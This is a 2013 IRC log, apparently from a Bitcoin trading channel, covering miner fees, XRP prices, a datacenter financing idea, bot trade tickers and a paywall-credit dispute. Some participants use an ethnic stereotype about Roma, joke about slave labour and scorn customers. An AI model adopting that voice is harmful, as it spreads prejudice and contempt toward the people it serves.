Feb 11 20:52:01 mircea_popescu: dude, if I had all of asiicminer Feb 11 20:52:08 mircea_popescu: I'd basically own most of the hashing power out there Feb 11 20:52:09 so miners would prolly sort out the txs by fee/bytes Feb 11 20:52:30 Diablo-D3 you get excited too easily. things don't work like they could Feb 11 20:52:32 yup, start sending a fee at that point if want immediate includsion in the blockchain Feb 11 20:52:33 so the fee revenue would go up a lot Feb 11 20:52:34 things work like they work. Feb 11 20:52:40 ThickAsThieves yes. Feb 11 20:52:44 conceivably. Feb 11 20:52:50 mircea_popescu: I am very unexcitable Feb 11 20:53:01 and fee revenue goes into blocks? Feb 11 20:53:04 1 BTC = 24.21231 U.S. dollars = 18.0715853 Euros Feb 11 20:53:10 ThickAsThieves that made no sense. Feb 11 20:53:27 just trying to fully graspo this Feb 11 20:53:37 where do fees go? Feb 11 20:53:39 a tx is (x+y+z) btc input (k+l+m) btc output. Feb 11 20:53:51 if input > output the difference is kept by whoever mines the blokc Feb 11 20:54:15 if that difference divided by the tx length is high everyone mining will want to include it in their block Feb 11 20:54:22 if its low nobody would include it unless there's space Feb 11 20:54:45 EskimoBob: it isnt yet Feb 11 20:54:47 think like the blocks are train wagons, and the tx are people. the fee is what they pay Feb 11 20:54:56 if a 200lb woman offers 10 bux she waits Feb 11 20:55:04 if some 75lb dood offers 100 bux he gets in Feb 11 20:55:05 right Feb 11 20:55:21 EskimoBob: the auctions are manual, yes Feb 11 20:55:30 so when the last new bitcoin is mined, miners mine for the fees only? Feb 11 20:55:33 it was on glbse Feb 11 20:55:46 ThickAsThieves: yes Feb 11 20:55:51 ThickAsThieves exactly Feb 11 20:55:57 EskimoBob: look in the auctions forum, several people are selling their shares Feb 11 20:56:06 so, say it's 2015 and 50% of the world is using bitcoin Feb 11 20:56:12 ok. Feb 11 20:56:18 EskimoBob: friedcat is going to be putting his own exchange up Feb 11 20:56:20 heh Feb 11 20:56:22 THEN WHY ASK Feb 11 20:56:29 you could potentially still make monet Feb 11 20:56:32 money* Feb 11 20:56:33 mininhg Feb 11 20:56:38 surely. Feb 11 20:56:39 Homomorphic Payment Addresses and the Pay-to-Contract Protocol http://arxiv.org/pdf/1212.3257 Feb 11 20:56:44 EskimoBob: because it kind of already is Feb 11 20:56:46 from https://github.com/bcpki/bitcoin/blob/master/README.md Feb 11 20:57:01 because thats not my choice Feb 11 20:57:32 i guess what i'm trying to confirm is, that all these charts miners are working on, and trying to predict difficulty are all totally thrown out the window if rapid bitcoin adoption happens Feb 11 20:57:44 [MPEX] [S.MPOE] 4944 @ 0.00062706 = 3.1002 BTC [-] Feb 11 20:57:55 ThickAsThieves yes. Feb 11 20:58:08 ok i'm done, thx :) Feb 11 20:58:15 the "charts" people like that idiot on reddit are working on are bs anyway Feb 11 20:58:27 for so many different reasons it doesn't even matter that adoption would skew Feb 11 20:58:40 1 BTC = 24.28302 U.S. dollars = 18.1243618 Euros Feb 11 20:58:52 DeaDTerra: what is XRP? Feb 11 20:59:29 "ripples" ripple.com transaction fee currency Feb 11 20:59:51 [MPEX] [S.MPOE] 5606 @ 0.00062706 = 3.5153 BTC [-] Feb 11 20:59:51 very rare only 10 billion Feb 11 20:59:52 [MPEX] [S.MPOE] 4244 @ 0.00062683 = 2.6603 BTC [-] Feb 11 20:59:56 who needs xrp? Feb 11 21:00:08 brokers that use bitfunder? Feb 11 21:00:41 ;) Feb 11 21:00:46 1btc for 100k xrp? Feb 11 21:00:50 yowsers Feb 11 21:01:18 wait, so supposedly xrp mkt cap is 100k btc ? Feb 11 21:01:24 in what parallel universe this ?! Feb 11 21:01:32 [MPEX] [S.MPOE] 13300 @ 0.00064024 = 8.5152 BTC [+] Feb 11 21:02:35 mircea_popescu: how many BTC do you have? Feb 11 21:02:41 a bunch Feb 11 21:02:47 more than 100k? Feb 11 21:02:49 Diablo-D3: how small is your dick? Feb 11 21:02:51 yeah. Feb 11 21:02:55 more than 400k? Feb 11 21:02:58 maybe. Feb 11 21:03:06 i'll sell 500 xrp for 1 btc DeaDTerra Feb 11 21:03:12 how many people do you think have more than 400k? Feb 11 21:03:21 or hell, more than 1k Feb 11 21:03:32 more than 1k at least 1k Feb 11 21:03:38 more than 400k maybe a dozen, if that. Feb 11 21:04:37 okay so Feb 11 21:05:09 do you think it'd be possible to raise a little over 400k btc to start a datacenter catering to high density computation customers? Feb 11 21:05:14 nope. Feb 11 21:05:40 even if it was done in bonds that pay the equiv of 5% annually for ten years? Feb 11 21:06:01 your 400k would be a very big 4% stake out of all bitcoin. your datacenter would be an inconsequential 0.0001% of all datacenters Feb 11 21:06:08 which is an inconsequential 0.0000% of all fiat. Feb 11 21:06:17 trades happen if and only if the % of btc you give away Feb 11 21:06:22 gets a larger % of fiat in exchange. Feb 11 21:06:45 yes, but it would have 100-150 racks profiting 10k USD a month Feb 11 21:06:52 makes no diff. Feb 11 21:07:01 400k btc just went from 14 each to 24 each Feb 11 21:07:01 ;;calc 10000 * 150 Feb 11 21:07:01 1500000 Feb 11 21:07:06 ;;calc 10000 * 150 / 24 Feb 11 21:07:07 62500 Feb 11 21:07:12 [MPEX] [S.MPOE] 21500 @ 0.00064196 = 13.8021 BTC [+] Feb 11 21:07:14 [MPEX] [S.MPOE] 5902 @ 0.00064263 = 3.7928 BTC [+] Feb 11 21:07:16 [MPEX] [S.MPOE] 1633 @ 0.00065011 = 1.0616 BTC [+] Feb 11 21:07:20 [MPEX] [S.MPOE] 497 @ 0.0006506 = 0.3233 BTC [+] Feb 11 21:07:21 [MPEX] [S.MPOE] 8200 @ 0.00065122 = 5.34 BTC [+] Feb 11 21:07:25 it'd generate 62.5k bitcoins a month. Feb 11 21:07:27 ;;calc 400000 * (24 - 14) Feb 11 21:07:27 [MPEX] [S.MPOE] 8600 @ 0.00065302 = 5.616 BTC [+] Feb 11 21:07:27 4000000 Feb 11 21:07:28 [MPEX] [S.MPOE] 13070 @ 0.00065318 = 8.5371 BTC [+] Feb 11 21:07:34 yeaa Feb 11 21:07:34 you will eventualyl be able to finance fiat endeavours in btc, but prolly after btc mkt cap passes 1 trillion. Feb 11 21:07:43 DeaDTerra: Im not going to let nefario sink this ship Feb 11 21:08:11 mircea_popescu: DMC could cause btc to reach $1000 Feb 11 21:08:20 DeaDTerra: not really. Feb 11 21:08:26 DeaDTerra: it never left the dock. Feb 11 21:10:42 for now the deals that make sense to finance in btc are the deals that bring btc. Feb 11 21:11:04 if you made a btc-taking datacenter. problem is the btc paying customers aren't doing more than maybe a few ks worth a year Feb 11 21:11:31 so your mkt cap is probably under 50k btc or something like that. Feb 11 21:12:21 wouldn't it make more sense to manage an existing datacenter Feb 11 21:12:34 it probably would. Feb 11 21:12:50 arguably it'd be a good idea to make a btc-level secure btc Feb 11 21:12:54 [MPEX] [S.MPOE] 6570 @ 0.00064415 = 4.2321 BTC [-] Feb 11 21:13:05 somewhere in a free country, with good safety in place Feb 11 21:13:10 and sell guaranteed space. Feb 11 21:13:26 mircea_popescu: I would accept btc, btw Feb 11 21:13:46 Bugpowder: no, most datacenters are pretty much fucked Feb 11 21:13:59 Bugpowder: they arent upgrading to handle customer demands and are massively wasting space Feb 11 21:14:07 Bugpowder: the only way to win is to come out of nowhere and eat their lunch Feb 11 21:14:53 you're not eating anyone's lunch Feb 11 21:15:02 the reason they're sloppy is that there's so much govt demand for them Feb 11 21:15:17 sloppy doesnt bring the money in Feb 11 21:17:12 [MPEX] [S.MPOE] 5775 @ 0.00065318 = 3.7721 BTC [+] Feb 11 21:17:32 many datacenters are not accepting new customers because they're "full" Feb 11 21:17:39 yet half their rack space is wasted because of mismanagement Feb 11 21:19:04 you're still not eating their lunch. Feb 11 21:19:12 they're not making a loss. Feb 11 21:19:21 not yet, not without a great plan. Feb 11 21:19:36 and capital, and 12 hour work days for the next several years Feb 11 21:19:46 then, maybe. Feb 11 21:19:57 even with all that. they'll be fine, you'll make a little more per sq foot Feb 11 21:22:07 which would be a nice business. Feb 11 21:22:32 Diablo-D3: i agree with you on the state of the industry. Feb 11 21:22:46 there is room for improvement. Feb 11 21:22:55 [MPEX] [O.BTCUSD.C210T] 3 @ 0.2192369 = 0.6577 BTC [+] Feb 11 21:24:13 [MPEX] [O.BTCUSD.C220T] 3 @ 0.18744462 = 0.5623 BTC Feb 11 21:24:51 problem is, a datacenter is something a multi-billion company makes. in fact, it's about on the level of building a nuclear plant. Feb 11 21:24:58 heck, if one had any sense they'd build them together. Feb 11 21:25:04 a nuclear plant and a datacenter. Feb 11 21:25:08 to use all its power. Feb 11 21:25:58 [MPEX] [S.MPOE] 9231 @ 0.00064415 = 5.9461 BTC [-] Feb 11 21:26:02 much smaller companies than that make datacenters, just as nice or nicer than the big ones, but less capacity Feb 11 21:26:02 [MPEX] [S.MPOE] 3969 @ 0.00064189 = 2.5477 BTC [-] Feb 11 21:26:35 everybody wants you to survive a nuclear strike even if you're just making toys Feb 11 21:26:45 im just thinking its so commodified it's probably the case economies of scale rule. Feb 11 21:26:51 [HAVELOCK] [HIM] 1 @ 13 BTC [+] Feb 11 21:26:54 yeah i find that Feb 11 21:27:19 but some people (over?)pay just to be "in house. and definately overpay for uptime they dont need Feb 11 21:28:14 i frequently say why the fuck do you think this place will last, you could just build one the next county over where everything is cheaper, the next country over where you can use slaves and pollute, etc Feb 11 21:28:42 slaves is always nice. Feb 11 21:28:53 well "cheaper labor" Feb 11 21:29:36 people who take their work seriously. Feb 11 21:30:14 yeah Feb 11 21:32:51 has there been some sort of glbse payout today from either glbse or btcsyn? Feb 11 21:33:06 not that i heard of. Feb 11 21:33:09 around 1530gmt Feb 11 21:33:17 [MPEX] [S.MPOE] 205 @ 0.00065318 = 0.1339 BTC [+] Feb 11 21:33:18 there's been a lot of bitcoin sindicate drama on the forum tho Feb 11 21:34:25 saw that, but I didn't think that anything was happening from glasswalker's side until tomorrow/wednesday as he was 'away on personal business/attending a wedding' according to last email Feb 11 21:34:40 or have I randomly been given some btc? Feb 11 21:35:18 [MPEX] [S.MPOE] 25395 @ 0.00065362 = 16.5987 BTC [+] Feb 11 21:35:20 [MPEX] [S.MPOE] 905 @ 0.00064189 = 0.5809 BTC [-] Feb 11 21:35:28 I love when that happens Feb 11 21:35:30 1. My God, What is this? Feb 11 21:35:30 Yes, the dog will tell you. Feb 11 21:35:38 for some reason the this is dog meme is really hard on foreigners. Feb 11 21:36:12 [MPEX] [S.MPOE] 3650 @ 0.00065516 = 2.3913 BTC [+] Feb 11 21:36:14 [MPEX] [S.MPOE] 18926 @ 0.00065549 = 12.4058 BTC [+] Feb 11 21:36:15 [MPEX] [S.MPOE] 4928 @ 0.00065549 = 3.2303 BTC [+] Feb 11 21:36:17 2. MPSIC what? Feb 11 21:36:17 The term stands for the standard identification code Pvpskvmybashd Mrsya. Feb 11 21:36:18 upupup Feb 11 21:36:20 ok, fuck me... Feb 11 21:37:31 lol @ this comment on superbowl bitbet: How can the Ravens be such underdogs when they have Capn' Stabbin Ray Lewis, ... Feb 11 21:37:55 is he good ? Feb 11 21:38:04 he was 10 years ago Feb 11 21:39:04 then he (or his friends) murdered someone outside the club after a SuperBowl in 2000 Feb 11 21:39:12 got off Feb 11 21:39:19 o hai! Feb 11 21:39:26 bitches be trippin Feb 11 21:39:28 ;;ticker Feb 11 21:39:29 BTCUSD ticker | Best bid: 24.40000, Best ask: 24.41768, Bid-ask spread: 0.01768, Last trade: 24.40000, 24 hour volume: 32455.87760636, 24 hour low: 23.50000, 24 hour high: 24.41769, 24 hour vwap: 23.97896 Feb 11 21:39:29 gettin stabbed Feb 11 21:39:40 STAB THE BEARZ Feb 11 21:39:52 i c Feb 11 21:39:56 ;;bids 24.40 Feb 11 21:39:59 There are currently 0 bitcoins demanded at or over 24.4 USD, worth 0.0 USD in total. Feb 11 21:40:11 bam Feb 11 21:40:13 up Feb 11 21:40:20 ;;bids 30 Feb 11 21:40:22 There are currently 0 bitcoins demanded at or over 30.0 USD, worth 0.0 USD in total. Feb 11 21:42:43 [MPEX] [S.MPOE] 17272 @ 0.00065549 = 11.3216 BTC [+] Feb 11 21:42:44 [MPEX] [S.MPOE] 28 @ 0.00065555 = 0.0184 BTC [+] Feb 11 21:49:05 [MPEX] [S.MPOE] 3850 @ 0.00064189 = 2.4713 BTC [-] Feb 11 21:50:18 Chilca btw, were you doing qa spanish mpex faq ? Feb 11 21:52:52 [HAVELOCK] [SDICE] 1 @ 0.7638 BTC [-] Feb 11 21:55:30 [MPEX] [S.MPOE] 3476 @ 0.00064189 = 2.2312 BTC [-] Feb 11 21:55:36 [MPEX] [S.MPOE] 9714 @ 0.00063776 = 6.1952 BTC [-] Feb 11 21:55:38 [MPEX] [S.MPOE] 7360 @ 0.00063066 = 4.6417 BTC [-] Feb 11 22:04:38 ;;ticker Feb 11 22:04:39 BTCUSD ticker | Best bid: 24.19720, Best ask: 24.23107, Bid-ask spread: 0.03387, Last trade: 24.19334, 24 hour volume: 33722.82880541, 24 hour low: 23.54000, 24 hour high: 24.44000, 24 hour vwap: 23.99748 Feb 11 22:06:37 [MPEX] [S.MPOE] 6300 @ 0.00064312 = 4.0517 BTC [+] Feb 11 22:06:41 [BTCTC] [B.YABMC] 4 @ 0.0249 = 0.0996 BTC [+] Feb 11 22:06:43 [BTCTC] [B.YABMC] 11 @ 0.0249 = 0.2739 BTC [+] Feb 11 22:07:06 ;;asks 25 Feb 11 22:07:08 There are currently 7707.7138 bitcoins offered at or under 25.0 USD, worth 191236.44685 USD in total. Feb 11 22:07:11 ;;bids 23 Feb 11 22:07:13 There are currently 7865.8976 bitcoins demanded at or over 23.0 USD, worth 183422.259511 USD in total. Feb 11 22:07:15 :) Feb 11 22:07:55 ;;asks 29.5 Feb 11 22:07:57 There are currently 16509.353 bitcoins offered at or under 29.5 USD, worth 428037.241778 USD in total. Feb 11 22:08:05 [BTCTC] [B.YABMC] 40 @ 0.025 = 1 BTC [+] Feb 11 22:08:21 ;;bids 22 Feb 11 22:08:23 There are currently 17945.695 bitcoins demanded at or over 22.0 USD, worth 409683.330498 USD in total. Feb 11 22:08:29 :D Feb 11 22:08:59 [BTCTC] [BASIC-MINING] 1 @ 0.3498 BTC [+] Feb 11 22:09:43 [BTCTC] [B.YABMC] 1 @ 0.025 BTC [+] Feb 11 22:11:04 [MPEX] [S.MPOE] 2750 @ 0.00064312 = 1.7686 BTC [+] Feb 11 22:11:06 [MPEX] [S.MPOE] 17150 @ 0.00065555 = 11.2427 BTC [+] Feb 11 22:14:47 [MPEX] [S.MPOE] 20600 @ 0.00065176 = 13.4263 BTC [-] Feb 11 22:16:20 ;;bc,24hprc Feb 11 22:16:22 23.93 Feb 11 22:16:51 [HAVELOCK] [SDICE] 2 @ 0.7644 = 1.5288 BTC [+] Feb 11 22:18:19 [MPEX] [S.MPOE] 200 @ 0.00065176 = 0.1304 BTC [-] Feb 11 22:18:21 [MPEX] [S.MPOE] 17337 @ 0.00064004 = 11.0964 BTC [-] Feb 11 22:26:29 [BTCTC] [COGNITIVE] 2 @ 0.3 = 0.6 BTC [-] Feb 11 22:26:52 [HAVELOCK] [SDICE] 2 @ 0.76380001 = 1.5276 BTC [-] Feb 11 22:26:54 [HAVELOCK] [SDICE] 4 @ 0.7638 = 3.0552 BTC [-] Feb 11 22:29:10 looks like havelock needs to add some more s.dice shares Feb 11 22:29:24 They have 1,000,000 shares Feb 11 22:29:43 900,000 actually Feb 11 22:30:06 it's trading high relative to mpex Feb 11 22:30:22 !ticker h sdice Feb 11 22:30:23 [HAVELOCK:SDICE] 1D: 0.71999000 / 0.74751773 / 0.76500000 (22 shares, 16.44539002 BTC), 7D: 0.52100000 / 0.62747513 / 0.76500000 (6394 shares, 4012.07597940 BTC), 30D: 0.44000000 / 0.64105367 / 0.89000000 (10577 shares, 6780.42462184 BTC) Feb 11 22:30:25 yeah Feb 11 22:30:29 74s yea Feb 11 22:30:32 If I were topace Feb 11 22:30:38 I would buy some and dump Feb 11 22:30:40 on havelock Feb 11 22:30:45 yep, same here Feb 11 22:30:48 well so buy 100k amnd push it to him Feb 11 22:30:54 i think he converts neh ? Feb 11 22:31:01 not that direction Feb 11 22:31:03 :) Feb 11 22:31:06 lol Feb 11 22:31:06 does he do that? Feb 11 22:31:13 [MPEX] [S.MPOE] 6172 @ 0.00065555 = 4.0461 BTC [+] Feb 11 22:31:20 maybe ask ? i thought it was discussed Feb 11 22:31:23 couldn't swear to it Feb 11 22:31:46 this is where evoorhees comes in and announces the NEXT TRANCHE! Feb 11 22:31:54 they have about 40,000 shares of bid at .0065 and above Feb 11 22:32:04 lol Feb 11 22:32:06 like... free money dudes Feb 11 22:32:54 just like picking up S.MPOE at .00062 Feb 11 22:32:59 FREE MONEY Feb 11 22:33:44 nobody seems to think so…. or the people who do are tapped out Feb 11 22:33:46 like me! Feb 11 22:34:32 and then they ask how does btc finance drive the btc. Feb 11 22:34:34 welllll... Feb 11 22:39:56 DeadWeasel this is eerie Feb 11 22:40:07 welcome evoorhees Feb 11 22:40:36 6 minutes lol Feb 11 22:43:55 how does btc finance drive teh btc? Feb 11 22:44:20 people getting tapped out. Feb 11 22:44:52 i was going to respond to that article but u seem busy mp Feb 11 22:45:00 the one about stoopids Feb 11 22:45:12 so go ahead Feb 11 22:45:33 gee cant i get to complain a lil Feb 11 22:45:42 fine i will ! Feb 11 22:46:27 oh i saw somethign about UK making ads to tell the Romanians to stay out cuz UK not so good lol Feb 11 22:47:25 http://www.publicserviceeurope.com/article/2686/uk-cannot-afford-eu-open-borders-any-longer Feb 11 22:48:00 [MPEX] [S.MPOE] 3228 @ 0.00065559 = 2.1162 BTC [+] Feb 11 22:48:14 welfare state collapsing all over the world Feb 11 22:48:17 why's that notable Feb 11 22:48:46 cuz they dont want Romanians and some other country taking the jobs? Feb 11 22:48:58 u know its GREAT britian Feb 11 22:49:18 Bulgarians Feb 11 22:49:26 maybe ask in #bitcoin-otc-uk Feb 11 22:49:45 heh Feb 11 22:49:52 how many bitcoin channels are there geez Feb 11 22:49:52 some dood insisted they need own channel Feb 11 22:49:58 without these rm Feb 11 22:50:10 romanians i suppose Feb 11 22:50:30 [MPEX] [S.MPOE] 16000 @ 0.00064286 = 10.2858 BTC [-] Feb 11 22:50:32 [MPEX] [S.MPOE] 8400 @ 0.00064004 = 5.3763 BTC [-] Feb 11 22:50:43 lol Feb 11 22:50:53 it's funny tho, cause they call them romanians but it's mostly gypsies Feb 11 22:50:58 who, you know, love to travel. Feb 11 22:51:27 gypsies so hated for no reason Feb 11 22:51:42 expatriated romanian donkey refugess Feb 11 22:51:46 *refugees Feb 11 22:53:50 lol Feb 11 22:54:40 did you hear about the romania, horses and france? Feb 11 22:54:45 [MPEX] [S.MPOE] 14100 @ 0.00064004 = 9.0246 BTC [-] Feb 11 22:55:21 lets hear it Feb 11 22:55:53 lol yeah Feb 11 22:56:03 it was funny cause that morning i had horse salami for breakfast Feb 11 22:56:27 [MPEX] [S.MPOE] 7900 @ 0.00064004 = 5.0563 BTC [-] Feb 11 22:56:44 i like horse meat a lot Feb 11 22:56:51 and they complain. Feb 11 22:56:59 wackos. Feb 11 22:57:14 well, if i ordered chicken curry and got pork curry i'd prolly say something Feb 11 22:57:33 horse meat found in 16 EU countries Feb 11 22:57:33 not if it tastes better and you dont know what it is. Feb 11 22:57:39 thanks france! Feb 11 22:57:46 it'd be pretty out there for me to not know what it is Feb 11 22:58:11 maybe you got pork in your horse salame what do you know Feb 11 22:58:43 i hear horse meat is delicious Feb 11 22:58:54 i taste horse meat is delicious Feb 11 22:59:39 its pretty good yeah Feb 11 22:59:45 there's this traditional salami thing in romania Feb 11 22:59:56 it's sort of like cheese (ie, grows a special mold) Feb 11 23:00:19 moldy romanian horse sausage ftw Feb 11 23:00:29 hello all Feb 11 23:00:40 http://www.recolta.eu/media/arhiva/salam-de-sibiu.jpeg Feb 11 23:00:43 that sort of thing. Feb 11 23:00:51 course by now it's industrially produced, they put pork in it etfc. Feb 11 23:01:48 mircea_popescu you should take mpex.com away from the midwest photo exchange Feb 11 23:02:01 why ? Feb 11 23:02:11 there's a bunch of things on the mpex name Feb 11 23:02:19 it will make you more money Feb 11 23:02:20 Membrane Protein Explorer (MPEx) Feb 11 23:02:28 Prosoniq MPEX Feb 11 23:02:36 The Maryland Physics Expectations Survey (MPEX) Feb 11 23:02:46 The Manufacturing Productivity Extension (MPEX) Program Feb 11 23:02:53 why be an ass about it ? Feb 11 23:03:19 not an ass! a big swinging dick! Feb 11 23:03:22 lol Feb 11 23:03:51 just email jim@mpex.com (srsly) and give him an offer Feb 11 23:04:21 what, 10 bux ? Feb 11 23:05:10 maybe just put your exchange somewhere between "lenses" and "lighting&studio" Feb 11 23:05:23 lol Feb 11 23:06:30 Balance Sheet: Feb 1, 2013 Feb 11 23:06:30 Short-term Assets Feb 11 23:06:30 Cash: BTC 815.51 (majority locked in Bitcoinica liquidation) Feb 11 23:06:35 [MPEX] [S.MPOE] 8043 @ 0.00064004 = 5.1478 BTC [-] Feb 11 23:06:38 [MPEX] [S.MPOE] 3907 @ 0.00063496 = 2.4808 BTC [-] Feb 11 23:06:43 someone explain to me how this guy's mind works Feb 11 23:06:48 who is that Feb 11 23:06:51 unreceivables = short term assets ? Feb 11 23:06:54 yochdog of all people. Feb 11 23:07:47 wait, it gets better Feb 11 23:07:47 Accounts receivable: 0 Feb 11 23:07:47 ASIC pre-orders, not delivered: $8,000 Feb 11 23:07:56 lets hear how mp's mind work though Feb 11 23:08:11 his short term is made out of accounts he can't collect and items he won't receive. Feb 11 23:08:22 maybe he thinks "short" means "missing" Feb 11 23:08:52 like "i'm a dollar short" Feb 11 23:09:02 how much is polimedia subscription Feb 11 23:09:10 you mean for the blog ? Feb 11 23:09:21 to view it Feb 11 23:09:36 whatever you want. a btc = 20000 credits atm Feb 11 23:09:42 ;;ticker Feb 11 23:09:42 BTCUSD ticker | Best bid: 24.36557, Best ask: 24.39955, Bid-ask spread: 0.03398, Last trade: 24.39955, 24 hour volume: 34302.41282646, 24 hour low: 23.54000, 24 hour high: 24.47002, 24 hour vwap: 24.01793 Feb 11 23:09:48 24017 to be precise Feb 11 23:10:08 well u know my stance Feb 11 23:10:27 next time dont post it there Feb 11 23:10:31 reddits better :) Feb 11 23:10:41 uh. you have a stance ? Feb 11 23:10:56 yes several Feb 11 23:18:02 [MPEX] [S.MPOE] 11450 @ 0.00063787 = 7.3036 BTC [+] Feb 11 23:28:00 anyone have experience buying bitcoins on kapiton.se? Feb 11 23:28:18 [MPEX] [S.MPOE] 6773 @ 0.00063787 = 4.3203 BTC [+] Feb 11 23:28:20 [MPEX] [S.MPOE] 508 @ 0.00063496 = 0.3226 BTC [-] Feb 11 23:32:29 dont buy trilemma credits Feb 11 23:32:59 i got 1000 and my ip change and mircea_popescu is refusing customer support :( Feb 11 23:33:20 thats just terrible Feb 11 23:34:42 u wrote them and no response? Feb 11 23:36:17 mircea_popescu can I get my credits updated :P Feb 11 23:36:32 [MPEX] [S.MPOE] 7260 @ 0.0006341 = 4.6036 BTC [-] Feb 11 23:36:32 can i get a reach around? Feb 11 23:36:39 yanks Feb 11 23:36:41 [MPEX] [S.MPOE] 8324 @ 0.00064027 = 5.3296 BTC [+] Feb 11 23:36:57 yup my credits is gone Feb 11 23:37:00 :P Feb 11 23:37:19 instead I will just hack the paywall like i have been doing Feb 11 23:37:38 thestringpuller um... didn't you get a pw ? Feb 11 23:39:02 angry mobs are just waiting around the corner if this isnt sorted! Feb 11 23:39:09 lol Feb 11 23:39:22 no no pw Feb 11 23:39:28 you did it based on my ip Feb 11 23:39:31 a well then. Feb 11 23:39:35 get your ip back. Feb 11 23:41:24 lololol Feb 11 23:41:58 it seems like the options expiring next month have a low open interest. go spend some btc on marketing Feb 11 23:41:58 internet id is how they roll over there? Feb 11 23:42:32 well, the way trilema credits work is you can have them by pw or by ip Feb 11 23:42:40 if you have them by ip and lose the ip you lose the credits. Feb 11 23:42:47 if you have them by pw and lose the pw you lose the credits. Feb 11 23:42:53 so... either way. buy moar. Feb 11 23:43:02 what kind b.s. is this Feb 11 23:43:11 no backups or recovery methods?? Feb 11 23:43:11 this is bitcoin. Feb 11 23:43:15 nope. Feb 11 23:43:24 why not Feb 11 23:43:25 buy 100 btc worth and take him to rota Feb 11 23:43:25 start listing quarterly options... your bot can handle longer-dated options Feb 11 23:43:28 shit happens Feb 11 23:43:28 customer is responsible for his own enjoyment. Feb 11 23:43:39 Lyspooner there's zero uptake of the march ones as it is Feb 11 23:43:49 that's a marketing issue Feb 11 23:43:53 truffles so if shit happens then why are we discussing it ? Feb 11 23:43:58 the contracts are well-designed Feb 11 23:44:11 customer needs help sorting his shit Feb 11 23:44:11 Lyspooner perhaps, but until it is resolved i see little point in adding even longer terms Feb 11 23:44:22 truffles that's sad for him now isn't it. Feb 11 23:44:46 unhappy customer is not good for business! Feb 11 23:44:52 i don't happen to care. Feb 11 23:45:01 i would much rather the consumer type customer dies hungry Feb 11 23:45:06 than make me rich Feb 11 23:45:09 mircea_popescu, the miners need to hedge longer exposure than two months, especially when dealing with asic dealers Feb 11 23:45:15 scrooge Feb 11 23:45:27 Lyspooner the miners are roughly too clueless to comprehend x.idiff and why they can't run without them Feb 11 23:45:34 in spite of ample marketing effort directed at their dumbass. Feb 11 23:45:41 that makes me sad Feb 11 23:45:47 not as sad as it makes me. Feb 11 23:46:20 https://bitcointalk.org/index.php?topic=139787.0 check that shit out Feb 11 23:46:21 lets all throw rotten tomatoes at mp Feb 11 23:46:31 truffles you new here i take it. Feb 11 23:46:38 yes Feb 11 23:46:45 i think im here approaching a week now Feb 11 23:46:50 cool. Feb 11 23:46:56 so there's this new doohickey called a bitcoin. Feb 11 23:47:09 what it does is two things : it fucks governments so they can no longer finance welfarism Feb 11 23:47:19 and it fucks over people so they can no longer expect others solve their shit for them Feb 11 23:47:25 i love it equally for both reasons. Feb 11 23:47:33 welfare is good for those who are disabled Feb 11 23:47:47 i think you're not paying attention. Feb 11 23:47:51 take it to -politics Feb 11 23:47:57 i am not trying to coopt your cooperation. i'm just telling you how it is. Feb 11 23:47:59 but the ppl who like solving solve Feb 11 23:48:19 how far out does x.diff go Feb 11 23:48:26 full year. Feb 11 23:48:36 yeah, that's being underutilized Feb 11 23:48:36 Tell that to all the taxes I pay and I don't get shit back - ever Feb 11 23:48:44 nobody thinks about the handicapers Feb 11 23:49:31 Lyspooner way. look here : http://trilema.com/2013/how-to-hedge-as-a-miner/ Feb 11 23:49:34 however, in the miners' defense, i don't think there is much paper interest on the other side of the transaction Feb 11 23:49:53 there's plenty of speculative money on mpex, and they're not putting the orders in the book anyway Feb 11 23:49:57 oh look another trilema linkey Feb 11 23:50:00 tl dr Feb 11 23:50:04 tl:dr lots of numbers Feb 11 23:50:07 oops didnt click Feb 11 23:50:12 lol Feb 11 23:50:39 just use a proxy truffles Feb 11 23:50:49 for what Feb 11 23:51:09 i think that you are not going to be successful at anything truffles, no matter by what standard you measure things Feb 11 23:51:25 i havent found a really reliable proxy server for free so meh Feb 11 23:51:50 see what you did Feb 11 23:51:55 omg Feb 11 23:52:02 [MPEX] [S.MPOE] 4900 @ 0.00063265 = 3.1 BTC [-] Feb 11 23:52:03 he cant just say that and leave Feb 11 23:52:06 lmao Feb 11 23:52:55 [MPEX] [S.MPOE] 5364 @ 0.00063066 = 3.3829 BTC [-] Feb 11 23:52:57 [MPEX] [S.MPOE] 5650 @ 0.00063046 = 3.5621 BTC [-] Feb 11 23:52:58 [MPEX] [S.MPOE] 686 @ 0.00062858 = 0.4312 BTC [-] Feb 11 23:53:29 if there's anything holding me back its procrastination Feb 11 23:56:14 def gonna stalk that guy damit Feb 11 23:59:13 [MPEX] [S.MPOE] 5423 @ 0.00062858 = 3.4088 BTC [-] Feb 11 23:59:15 [MPEX] [S.MPOE] 3177 @ 0.00062683 = 1.9914 BTC [-] Feb 11 23:59:53 [HAVELOCK] [SDICE] 10 @ 0.758 = 7.58 BTC [-] Feb 12 00:00:41 im a friendly person Feb 12 00:05:53 [HAVELOCK] [SDICE] 10 @ 0.759 = 7.59 BTC [+] Feb 12 00:05:54 [HAVELOCK] [SDICE] 8 @ 0.76 = 6.08 BTC [+] Feb 12 00:06:37 lmao Feb 12 00:06:46 !ticker m s.dice Feb 12 00:06:48 [MPEX:S.DICE] 1D: 0.00556183 / 0.00606203 / 0.0064 (49421 shares, 299.59 BTC), 7D: 0.0042 / 0.00571766 / 0.00739498 (4354487 shares, 24,897.50 BTC), 30D: 0.00085848 / 0.00556178 / 0.0075 (8437874 shares, 46,929.61 BTC) Feb 12 00:07:58 ;;calc (0.76 - 0.00606203 * 100 * 95/100) * 18 Feb 12 00:07:58 3.3139287 Feb 12 00:08:53 [HAVELOCK] [SDICE] 10 @ 0.76 = 7.6 BTC [+] Feb 12 00:09:04 mp i am friendly! Feb 12 00:09:49 there are less ppl in here so obv i type here Feb 12 00:10:03 betting like half the ppl read the comments Feb 12 00:12:04 that's.. kind of creepy. Feb 12 00:12:31 "13:56 < truffles> def gonna stalk that guy damit" Feb 12 00:12:45 so you're friendly, good for you. what of it ? Feb 12 00:13:02 u laughed meaning u didnt believe me Feb 12 00:13:20 i called it very interested midnightmagic Feb 12 00:13:25 -ed Feb 12 00:13:28 most stuff happening in this channel is not related to you. Feb 12 00:13:32 i laughed at the price insanity. Feb 12 00:13:40 ok Feb 12 00:13:45 [MPEX] [S.MPOE] 11903 @ 0.00062683 = 7.4612 BTC [-] Feb 12 00:19:41 midnightmagic, dont u get the feeling bitcoiners are in a cult Feb 12 00:21:41 truffles: I get the feeling people looking in think it's a cult because the idea is strong enough to change minds. I also think people think all the psychopaths sniffing around the edges trying to fleece victims aren't doing us any favours, nor idiotic sites like silk road. Feb 12 00:22:01 [MPEX] [S.MPOE] 